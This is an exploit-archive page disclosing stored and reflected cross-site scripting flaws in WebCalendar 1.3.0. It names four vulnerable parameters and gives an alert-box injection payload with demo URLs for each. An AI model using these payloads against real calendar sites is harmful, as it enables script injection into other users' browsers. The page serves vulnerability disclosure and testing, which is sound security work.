WebCalendar 1.3.0 Cross Site Scripting

WebCalendar 1.3.0 Cross Site Scripting: Posted Jan 3, 2024; Authored by tmrswrr; WebCalendar version 1.3.0 suffers from reflective and persistent cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | cb5698f0beb364a725e199770656e58b9e9a32317192310e1c09e248ae8bad4f; Download | Favorite | View

WebCalendar 1.3.0 Cross Site Scripting

# Exploit Title: WebCalendar  Version: 1.3.0 - Stored XSS - Reflected XSS 
# Date: 2024-3-1
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.k5n.us/webcalendar.php
# Version: 1.3.0
# Tested on: https://www.softaculous.com/apps/calendars/WebCalendar

## Stored XSS

1 ) Write Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03    
    this payload : <sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will bee alert button : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php


=============================================================================================

## Reflected XSS

1 ) Go to this url and write payload : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)//   
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button 


==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3

==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201


===============================================================================================

Top Authors In Last 30 Days

Red Hat 247 files
indoushka 101 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 21 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,775)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,536)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,750)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

WebCalendar 1.3.0 Cross Site Scripting

WebCalendar 1.3.0 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WebCalendar 1.3.0 Cross Site Scripting

Share This

WebCalendar 1.3.0 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems